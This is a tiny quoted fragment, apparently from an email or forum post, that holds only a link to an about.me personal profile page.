> http://about.me/stamparm
>

